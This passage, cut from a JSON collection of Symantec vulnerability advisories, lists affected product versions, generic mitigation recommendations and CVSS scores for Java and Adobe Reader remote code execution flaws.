(Windows Production Release) 1.7.0_2 \n * Oracle JRE (Windows Production Release) 1.7.0_4 \n * Oracle JRE (Windows Production Release) 1.7.0_7 \n * Oracle JRE(Linux Production Release) 1.7.0_10 \n * Oracle JRE(Linux Production Release) 1.7.0_11 \n * Oracle JRE(Linux Production Release) 1.7.0_17 \n * Oracle JRE(Linux Production Release) 1.7.0_8 \n * Oracle JRE(Linux Production Release) 1.7.0_9 \n * Oracle JRE(Solaris Production Release) 1.7.0_10 \n * Oracle JRE(Solaris Production Release) 1.7.0_11 \n * Oracle JRE(Solaris Production Release) 1.7.0_13 \n * Oracle JRE(Solaris Production Release) 1.7.0_17 \n * Oracle JRE(Solaris Production Release) 1.7.0_8 \n * Oracle JRE(Solaris Production Release) 1.7.0_9 \n * Oracle JRE(Windows Production Release) 1.7.0_10 \n * Oracle JRE(Windows Production Release) 1.7.0_11 \n * Oracle JRE(Windows Production Release) 1.7.0_12 \n * Oracle JRE(Windows Production Release) 1.7.0_13 \n * Oracle JRE(Windows Production Release) 1.7.0_17 \n * Oracle JRE(Windows Production Release) 1.7.0_8 \n * Oracle JRE(Windows Production Release) 1.7.0_9 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server AUS 6.4 \n * Redhat Enterprise Linux Server EUS 6.4.z \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE openSUSE 12.2 \n * Sun JRE (Linux Production Release) 1.7 \n * Sun JRE (Solaris Production Release) 1.7 \n * Sun JRE (Windows Production Release) 1.7 \n * Ubuntu Ubuntu Linux 12.10 amd64 \n * Ubuntu Ubuntu Linux 12.10 i386 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "published": "2013-04-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/59162", "cvelist": ["CVE-2013-2423", "CVE-2013-1347"], "lastseen": "2018-03-14T22:43:01"}, {"id": "SMNTC-38195", "type": "symantec", "title": "Adobe Acrobat and Reader CVE-2010-0188 Remote Code Execution Vulnerability", "description": "### Description\n\nAdobe Acrobat and Reader are prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. The following products are affected: Reader 9.3 for Windows, Macintosh, and UNIX Acrobat 9.3 for Windows and Macintosh Reader 8.2 for Windows and Macintosh Acrobat 8.2 for Windows and Macintosh NOTE: This BID was originally titled 'Adobe Acrobat and Reader APSB10-07 Unspecified Security Vulnerabilities' but has been updated with the release of the Adobe patches. NOTE (February 19, 2010): Reports indicate that this issue may be related to the vulnerability discussed in BID 19283 (LibTIFF TiffFetchShortPair Remote Buffer Overflow Vulnerability). We will update this BID as more information emerges.\n\n### Technologies Affected\n\n * Adobe Acrobat 9.1.1 \n * Adobe Acrobat 9.2 \n * Adobe Acrobat 9.3 \n * Adobe Acrobat Professional 8.0 \n * Adobe Acrobat Professional 8.1 \n * Adobe Acrobat Professional 8.1.1 \n * Adobe Acrobat Professional 8.1.2 \n * Adobe Acrobat Professional 8.1.2 Security Update 1 \n * Adobe Acrobat Professional 8.1.3 \n * Adobe Acrobat Professional 8.1.4 \n * Adobe Acrobat Professional 8.1.6 \n * Adobe Acrobat Professional 8.1.7 \n * Adobe Acrobat Professional 8.2 \n * Adobe Acrobat Professional 9 \n * Adobe Acrobat Professional 9.1 \n * Adobe Acrobat Professional 9.1.2 \n * Adobe Acrobat Professional 9.1.3 \n * Adobe Acrobat Professional 9.2 \n * Adobe Acrobat Professional 9.3 \n * Adobe Acrobat Standard 8.0 \n * Adobe Acrobat Standard 8.1 \n * Adobe Acrobat Standard 8.1.1 \n * Adobe Acrobat Standard 8.1.2 \n * Adobe Acrobat Standard 8.1.3 \n * Adobe Acrobat Standard 8.1.4 \n * Adobe Acrobat Standard 8.1.6 \n * Adobe Acrobat Standard 8.1.7 \n * Adobe Acrobat Standard 8.2 \n * Adobe Acrobat Standard 9 \n * Adobe Acrobat Standard 9.1 \n * Adobe Acrobat Standard 9.1.2 \n * Adobe Acrobat Standard 9.1.3 \n * Adobe Acrobat Standard 9.2 \n * Adobe Acrobat Standard 9.3 \n * Adobe Reader 8.0 \n * Adobe Reader 8.1 \n * Adobe Reader 8.1.1 \n * Adobe Reader 8.1.2 \n * Adobe Reader 8.1.2 Security Update 1 \n * Adobe Reader 8.1.3 \n * Adobe Reader 8.1.4 \n * Adobe Reader 8.1.5 \n * Adobe Reader 8.1.6 \n * Adobe Reader 8.1.7 \n * Adobe Reader 8.2 \n * Adobe Reader 9 \n * Adobe Reader 9.1 \n * Adobe Reader 9.1.1 \n * Adobe Reader 9.1.2 \n * Adobe Reader 9.1.3 \n * Adobe Reader 9.2 \n * Adobe Reader 9.3 \n * Gentoo Linux \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux ES 4.8.Z \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux EUS 5.4.Z Server \n * SuSE Moblin 2.0 \n * SuSE SUSE Linux Enterprise 11 \n * SuSE Suse Linux Enterprise Desktop 10 SP2 \n * SuSE Suse Linux Enterprise Desktop 10 SP3 \n * SuSE openSUSE 11.0 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisable support for script code and active content within a client browser to reduce the chances of a successful exploit. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references for more information. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "published": "2010-02-11T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/38195", "cvelist": ["CVE-2013-1347", "CVE-2010-0188"], "lastseen": "2018-03-12T06:25:05"}, {"id": "SMNTC-50218", "type": "symantec", "title": "Oracle Java SE Rhino Script Engine Remote Code Execution Vulnerability", "description": "### Description\n\nOracle Java SE is prone to a remote code-execution vulnerability in Java Runtime Environment. The vulnerability can be exploited over multiple protocols. This issue affects the 'Scripting' sub-component. This vulnerability affects the following supported versions: JDK and JRE 7, 6 Update 27\n\n### Technologies Affected\n\n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X 10.6.5 \n * Apple Mac OS X 10.6.5 \n * Apple Mac OS X 10.6.6 \n * Apple Mac OS X 10.6.7 \n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Apple Mac OS X Server 10.6.5 \n * Apple Mac OS X Server 10.6.6 \n * Apple Mac OS X Server 10.6.7 \n * Apple Mac OS X Server 10.6.8 \n * Apple Mac OS X Server 10.7 \n * Apple Mac OS X Server 10.7.1 \n * Apple Mac OS X Server 10.7.2 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 5.1 \n * Avaya Aura Communication Manager 5.2 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Conferencing 6.0.0 Standard \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura SIP Enablement Services 4.0 \n * Avaya Aura SIP Enablement Services 5.0 \n * Avaya Aura SIP Enablement Services 5.1 \n * Avaya Aura SIP Enablement Services 5.2 \n * Avaya Aura SIP Enablement Services 5.2.1 \n * Avaya Aura Session Manager 1.1 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya CMS Server 15.0 \n * Avaya CMS Server 15.0 AUX \n * Avaya CMS Server 16.0 \n * Avaya CMS Server 16.1 \n * Avaya CMS Server 16.2 \n * Avaya IP Office Application Server 6.0 \n * Avaya IP Office Application Server 6.1 \n * Avaya IP Office Application Server 7.0 \n * Avaya IQ 5 \n * Avaya IQ 5.1 \n * Avaya IQ 5.1.1 \n * Avaya IQ 5.2 \n * Avaya IR 4.0 \n * Avaya Interactive Response 4.0 \n * Avaya Meeting Exchange 5.0 \n * Avaya Meeting Exchange 5.0 SP1 \n * Avaya Meeting Exchange 5.0 SP2 \n * Avaya Meeting Exchange 5.0.0.0.52 \n * Avaya Meeting Exchange 5.1 \n * Avaya Meeting Exchange 5.1 SP1 \n * Avaya Meeting Exchange 5.2 \n * Avaya Meeting Exchange 5.2 SP1 \n * Avaya Meeting Exchange 5.2 SP2 \n * Avaya Message Networking 5.2 \n * Avaya Message Networking 5.2 SP1 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Storage Server 5.2 \n * Avaya Messaging Storage Server 5.2 SP1 \n * Avaya Messaging Storage Server 5.2 SP2 \n * Avaya Messaging Storage Server 5.2 SP3 \n * Avaya Messaging Storage Server 5.2.2 \n * Avaya Messaging Storage Server 5.2.8 \n * Avaya Proactive Contact 4.0 \n * Avaya Proactive Contact 4.0.1 \n * Avaya Proactive Contact 4.1 \n * Avaya Proactive Contact 4.1.1 \n * Avaya Proactive Contact 4.1.2 \n * Avaya Proactive Contact 4.2 \n * Avaya Proactive Contact 4.2.1 \n * Avaya Proactive Contact 4.2.2 \n * Avaya Proactive Contact 5.0 \n * Avaya Voice Portal 4.0 \n * Avaya Voice Portal 4.1 \n * Avaya Voice Portal 4.1 SP1 \n * Avaya Voice Portal 4.1 SP2 \n * Avaya Voice Portal 5.0 \n * Avaya Voice Portal 5.0 SP1 \n * Avaya Voice Portal 5.0 SP2 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1 SP1 \n * Avaya Voice Portal 5.1.1 \n * Avaya Voice Portal 5.1.2 \n * Debian Linux 6.0 amd64 \n * Debian Linux 6.0 arm \n * Debian Linux 6.0 ia-32 \n * Debian Linux 6.0 ia-64 \n * Debian Linux 6.0 mips \n * Debian Linux 6.0 powerpc \n * Debian Linux 6.0 s/390 \n * Debian Linux 6.0 sparc \n * Fedoraproject Fedora 14 \n * Fedoraproject Fedora 15 \n * Fedoraproject Fedora 16 \n * Gentoo Linux \n * HP HP-UX B.11.11 \n * HP HP-UX B.11.23 \n * HP HP-UX B.11.31 \n * HP Network Node Manager i 9.1 \n * HP NonStop Server H06.15.00 \n * HP NonStop Server H06.15.01 \n * HP NonStop Server H06.15.02 \n * HP NonStop Server H06.16.00 \n * HP NonStop Server H06.16.01 \n * HP NonStop Server H06.16.02 \n * HP NonStop Server H06.17.00 \n * HP NonStop Server H06.17.01 \n * HP NonStop Server H06.17.02 \n * HP NonStop Server H06.17.03 \n * HP NonStop Server H06.18.00 \n * HP NonStop Server H06.18.01 \n * HP NonStop Server H06.18.02 \n * HP NonStop Server H06.19.00 \n * HP NonStop Server H06.19.01 \n * HP NonStop Server H06.19.02 \n * HP NonStop Server H06.19.03 \n * HP NonStop Server H06.20.00 \n * HP NonStop Server H06.20.01 \n * HP NonStop Server H06.20.02 \n * HP NonStop Server H06.20.03 \n * HP NonStop Server H06.21.00 \n * HP NonStop Server H06.21.01 \n * HP NonStop Server H06.21.02 \n * HP NonStop Server H06.22.00 \n * HP NonStop Server H06.22.01 \n * HP NonStop Server H06.23 \n * HP NonStop Server H06.24 \n * HP NonStop Server H06.24.01 \n * HP NonStop Server H06.25 \n * HP NonStop Server H06.25.01 \n * HP NonStop Server H06.26 \n * HP NonStop Server H06.26.01 \n * HP NonStop Server H06.27 \n * HP NonStop Server J06.04.00 \n * HP NonStop Server J06.04.01 \n * HP NonStop Server J06.04.02 \n * HP NonStop Server J06.05.00 \n * HP NonStop Server J06.05.01 \n * HP NonStop Server J06.05.02 \n * HP NonStop Server J06.06.00 \n * HP NonStop Server J06.06.01 \n * HP NonStop Server J06.06.02 \n * HP NonStop Server J06.06.03 \n * HP NonStop Server J06.07.00 \n * HP NonStop Server J06.07.01 \n * HP NonStop Server J06.07.02 \n * HP NonStop Server J06.08.00 \n * HP NonStop Server J06.08.01 \n * HP NonStop Server J06.08.02 \n * HP NonStop Server J06.08.03 \n * HP NonStop Server J06.08.04 \n * HP NonStop Server J06.09.00 \n * HP NonStop Server J06.09.01 \n * HP NonStop Server J06.09.02 \n * HP NonStop Server J06.09.03 \n * HP NonStop Server J06.09.04 \n * HP NonStop Server J06.10.00 \n * HP NonStop Server J06.10.01 \n * HP NonStop Server J06.10.02 \n * HP NonStop Server J06.11.00 \n * HP NonStop Server J06.11.01 \n * HP NonStop Server J06.12.00 \n * HP NonStop Server J06.13 \n * HP NonStop Server J06.13.01 \n * HP NonStop Server J06.14 \n * HP NonStop Server J06.14.02 \n * HP NonStop Server J06.15 \n * HP NonStop Server J06.15.01 \n * HP NonStop Server J06.16 \n * HP NonStop Server J6.0.14.01 \n * IBM Java SE 6 \n * IBM Java SE 6 SR8 FP1 \n * IBM Java SE 6.0 \n * IBM Java SE 6.0 SR5 \n * IBM Java SE 6.0 SR6 \n * IBM Java SE 6.0 SR7 \n * IBM Java SE 6.0.0 SR9 \n * IBM Java SE 6.0.0 SR9-FP2 \n * IBM Java SE 7 \n * IBM Java SE 7.0 \n * IBM Rational AppScan Enterprise 8.0.0 \n * IBM Rational AppScan Enterprise 8.0.0.1 \n * IBM Rational AppScan Enterprise 8.0.1 \n * IBM Rational AppScan Enterprise 8.0.1.1 \n * IBM Rational AppScan Enterprise 8.5.0.1 \n * IBM Rational AppScan Enterprise 8.6 \n * IBM Rational AppScan Standard 7.8 \n * IBM Rational AppScan Standard 8.0.0 \n * IBM Rational AppScan Standard 8.0.0.3 \n * IBM Rational AppScan Standard 8.5.0.1 \n * IBM Rational Policy Tester 8.0 \n * IBM Rational Policy Tester 8.5 \n * IBM Rational Policy Tester 8.5.0.1 \n * Mandriva Enterprise Server 5 \n * Mandriva Enterprise Server 5 X86 64 \n * Mandriva Linux Mandrake 2010.1 \n * Mandriva Linux Mandrake 2010.1 X86 64 \n * Mandriva Linux Mandrake 2011 \n * Mandriva Linux Mandrake 2011 x86_64 \n * OpenJDK OpenJDK 1.6.0 \n * OpenJDK OpenJDK 6 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle JDK (Linux Production Release) 1.6.0_22 \n * Oracle JDK (Linux Production Release) 1.6.0_23 \n * Oracle JDK (Linux Production Release) 1.6.0_24 \n * Oracle JDK (Linux Production Release) 1.6.0_25 \n * Oracle JDK (Linux Production Release) 1.6.0_26 \n * Oracle JDK (Linux Production Release) 1.6.0_27 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.6.0_22 \n * Oracle JDK (Solaris Production Release) 1.6.0_23 \n * Oracle JDK (Solaris Production Release) 1.6.0_24 \n * Oracle JDK (Solaris Production Release) 1.6.0_25 \n * Oracle JDK (Solaris Production Release) 1.6.0_26 \n * Oracle JDK (Solaris Production Release) 1.6.0_27 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.6.0_22 \n * Oracle JDK (Windows Production Release) 1.6.0_23 \n * Oracle JDK (Windows Production Release) 1.6.0_24 \n * Oracle JDK (Windows Production Release) 1.6.0_25 \n * Oracle JDK (Windows Production Release) 1.6.0_26 \n * Oracle JDK (Windows Production Release) 1.6.0_27 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JRE (Linux Production Release) 1.6.0_22 \n * Oracle JRE (Linux Production Release) 1.6.0_23 \n * Oracle JRE (Linux Production Release) 1.6.0_24 \n * Oracle JRE (Linux Production Release) 1.6.0_25 \n * Oracle JRE (Linux Production Release) 1.6.0_26 \n * Oracle JRE (Linux Production Release) 1.6.0_27 \n * Oracle JRE (Solaris Production Release) 1.6.0_22 \n * Oracle JRE (Solaris Production Release) 1.6.0_23 \n * Oracle JRE (Solaris Production Release) 1.6.0_24 \n * Oracle JRE (Solaris Production Release) 1.6.0_25 \n * Oracle JRE (Solaris Production Release) 1.6.0_26 \n * Oracle JRE (Solaris Production Release) 1.6.0_27 \n * Oracle JRE (Windows Production Release) 1.6.0_22 \n * Oracle JRE (Windows Production Release) 1.6.0_23 \n * Oracle JRE (Windows Production Release) 1.6.0_24 \n * Oracle JRE (Windows Production Release) 1.6.0_25 \n * Oracle JRE (Windows Production Release) 1.6.0_26 \n * Oracle JRE (Windows Production Release) 1.6.0_27 \n * Panda Antivirus 1.6.0 Update 1 \n * Panda Antivirus 1.6.0 Update 10 \n * Panda Antivirus 1.6.0 Update 11 \n * Panda Antivirus 1.6.0 Update 12 \n * Panda Antivirus 1.6.0 Update 13 \n * Panda Antivirus 1.6.0 Update 14 \n * Panda Antivirus 1.6.0 Update 15 \n * Panda Antivirus 1.6.0 Update 16 \n * Panda Antivirus 1.6.0 Update 17 \n * Panda Antivirus 1.6.0 Update 18 \n * Panda Antivirus 1.6.0 Update 19 \n * Panda Antivirus 1.6.0 Update 2 \n * Panda Antivirus 1.6.0 Update 20 \n * Panda Antivirus 1.6.0 Update 21 \n * Panda Antivirus 1.6.0 Update 3 \n * Panda Antivirus 1.6.0 Update 4 \n * Panda Antivirus 1.6.0 Update 5 \n * Panda Antivirus 1.6.0 Update 6 \n * Panda Antivirus 1.6.0 Update 7 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 4 \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Schneider-Electric Trio TView Software 3.27.0 \n * SuSE SUSE Linux Enterprise Java 10 SP4 \n * SuSE SUSE Linux Enterprise Java 11 SP1 \n * SuSE SUSE Linux Enterprise SDK 11 SP1 \n * SuSE SUSE Linux Enterprise Server 10 SP4 \n * SuSE SUSE Linux Enterprise Server 11 SP1 \n * SuSE SUSE Linux Enterprise Server 11 SP1 for SP2 \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP1 \n * SuSE SUSE Linux Enterprise Software Development Kit 11 SP1 for SP2 \n * Sun JDK (Linux Production Release) 1.6.0 17 \n * Sun JDK (Linux Production Release) 1.6.0 01 \n * Sun JDK (Linux Production Release) 1.6.0 01-B06 \n * Sun JDK (Linux Production Release) 1.6.0 02 \n * Sun JDK (Linux Production Release) 1.6.0 03 \n * Sun JDK (Linux Production Release) 1.6.0 04 \n * Sun JDK (Linux Production Release) 1.6.0 05 \n * Sun JDK (Linux Production Release) 1.6.0 06 \n * Sun JDK (Linux Production Release) 1.6.0 07 \n * Sun JDK (Linux Production Release) 1.6.0 10 \n * Sun JDK (Linux Production Release) 1.6.0 11 \n * Sun JDK (Linux Production Release) 1.6.0 13 \n * Sun JDK (Linux Production Release) 1.6.0 14 \n * Sun JDK (Linux Production Release) 1.6.0 15 \n * Sun JDK (Linux Production Release) 1.6.0 18 \n * Sun JDK (Linux Production Release) 1.6.0 19 \n * Sun JDK (Linux Production Release) 1.6.0 20 \n * Sun JDK (Linux Production Release) 1.6.0 \n * Sun JDK (Linux Production Release) 1.6.0 Update 10 \n * Sun JDK (Linux Production Release) 1.6.0 Update 11 \n * Sun JDK (Linux Production Release) 1.6.0 Update 12 \n * Sun JDK (Linux Production Release) 1.6.0 Update 13 \n * Sun JDK (Linux Production Release) 1.6.0 Update 14 \n * Sun JDK (Linux Production Release) 1.6.0 Update 15 \n * Sun JDK (Linux Production Release) 1.6.0 Update 16 \n * Sun JDK (Linux Production Release) 1.6.0 Update 17 \n * Sun JDK (Linux Production Release) 1.6.0 Update 18 \n * Sun JDK (Linux Production Release) 1.6.0 Update 19 \n * Sun JDK (Linux Production Release) 1.6.0 Update 20 \n * Sun JDK (Linux Production Release) 1.6.0 Update 21 \n * Sun JDK (Linux Production Release) 1.6.0 Update 3 \n * Sun JDK (Linux Production Release) 1.6.0 Update 4 \n * Sun JDK (Linux Production Release) 1.6.0 Update 5 \n * Sun JDK (Linux Production Release) 1.6.0 Update 6 \n * Sun JDK (Linux Production Release) 1.6.0 Update 7 \n * Sun JDK (Linux Production Release) 1.6.0_21 \n * Sun JDK (Solaris Production Release) 1.6.0 17 \n * Sun JDK (Solaris Production Release) 1.6.0 01 \n * Sun JDK (Solaris Production Release) 1.6.0 01-B06 \n * Sun JDK (Solaris Production Release) 1.6.0 02 \n * Sun JDK (Solaris Production Release) 1.6.0 03 \n * Sun JDK (Solaris Production Release) 1.6.0 04 \n * Sun JDK (Solaris Production Release) 1.6.0 05 \n * Sun JDK (Solaris Production Release) 1.6.0 06 \n * Sun JDK (Solaris Production Release) 1.6.0 07 \n * Sun JDK (Solaris Production Release) 1.6.0 10 \n * Sun JDK (Solaris Production Release) 1.6.0 11 \n * Sun JDK (Solaris Production Release) 1.6.0 13 \n * Sun JDK (Solaris Production Release) 1.6.0 14 \n * Sun JDK (Solaris Production Release) 1.6.0 15 \n * Sun JDK (Solaris Production Release) 1.6.0 18 \n * Sun JDK (Solaris Production Release) 1.6.0 19 \n * Sun JDK (Solaris Production Release) 1.6.0 20 \n * Sun JDK (Solaris Production Release) 1.6.0 \n * Sun JDK (Solaris Production Release) 1.6.0_21 \n * Sun JDK (Windows Production Release) 1.6.0 17 \n * Sun JDK (Windows Production Release) 1.6.0 01 \n * Sun JDK (Windows Production Release) 1.6.0 01-B06 \n * Sun JDK (Windows Production Release) 1.6.0 02 \n * Sun JDK (Windows Production Release) 1.6.0 03 \n * Sun JDK (Windows Production Release) 1.6.0 04 \n * Sun JDK (Windows Production Release) 1.6.0 05 \n * Sun JDK (Windows Production Release) 1.6.0 06 \n * Sun JDK (Windows Production Release) 1.6.0 07 \n * Sun JDK (Windows Production Release) 1.6.0 10 \n * Sun JDK (Windows Production Release) 1.6.0 11 \n * Sun JDK (Windows Production Release) 1.6.0 13 \n * Sun JDK (Windows Production Release) 1.6.0 14 \n * Sun JDK (Windows Production Release) 1.6.0 15 \n * Sun JDK (Windows Production Release) 1.6.0 18 \n * Sun JDK (Windows Production Release) 1.6.0 19 \n * Sun JDK (Windows Production Release) 1.6.0 20 \n * Sun JDK (Windows Production Release) 1.6.0 \n * Sun JDK (Windows Production Release) 1.6.0_21 \n * Sun JRE (Linux Production Release) 1.6.0 17 \n * Sun JRE (Linux Production Release) 1.6.0 01 \n * Sun JRE (Linux Production Release) 1.6.0 02 \n * Sun JRE (Linux Production Release) 1.6.0 03 \n * Sun JRE (Linux Production Release) 1.6.0 04 \n * Sun JRE (Linux Production Release) 1.6.0 05 \n * Sun JRE (Linux Production Release) 1.6.0 06 \n * Sun JRE (Linux Production Release) 1.6.0 07 \n * Sun JRE (Linux Production Release) 1.6.0 10 \n * Sun JRE (Linux Production Release) 1.6.0 11 \n * Sun JRE (Linux Production Release) 1.6.0 12 \n * Sun JRE (Linux Production Release) 1.6.0 13 \n * Sun JRE (Linux Production Release) 1.6.0 14 \n * Sun JRE (Linux Production Release) 1.6.0 15 \n * Sun JRE (Linux Production Release) 1.6.0 18 \n * Sun JRE (Linux Production Release) 1.6.0 19 \n * Sun JRE (Linux Production Release) 1.6.0 20 \n * Sun JRE (Linux Production Release) 1.6.0 \n * Sun JRE (Linux Production Release) 1.6.0_21 \n * Sun JRE (Linux Production Release) 1.7 \n * Sun JRE (Solaris Production Release) 1.6.0 17 \n * Sun JRE (Solaris Production Release) 1.6.0 01 \n * Sun JRE (Solaris Production Release) 1.6.0 02 \n * Sun JRE (Solaris Production Release) 1.6.0 03 \n * Sun JRE (Solaris Production Release) 1.6.0 04 \n * Sun JRE (Solaris Production Release) 1.6.0 05 \n * Sun JRE (Solaris Production Release) 1.6.0 06 \n * Sun JRE (Solaris Production Release) 1.6.0 07 \n * Sun JRE (Solaris Production Release) 1.6.0 10 \n * Sun JRE (Solaris Production Release) 1.6.0 11 \n * Sun JRE (Solaris Production Release) 1.6.0 12 \n * Sun JRE (Solaris Production Release) 1.6.0 13 \n * Sun JRE (Solaris Production Release) 1.6.0 14 \n * Sun JRE (Solaris Production Release) 1.6.0 15 \n * Sun JRE (Solaris Production Release) 1.6.0 18 \n * Sun JRE (Solaris Production Release) 1.6.0 19 \n * Sun JRE (Solaris Production Release) 1.6.0 2 \n * Sun JRE (Solaris Production Release) 1.6.0 \n * Sun JRE (Solaris Production Release) 1.6.0_21 \n * Sun JRE (Solaris Production Release) 1.7 \n * Sun JRE (Windows Production Release) 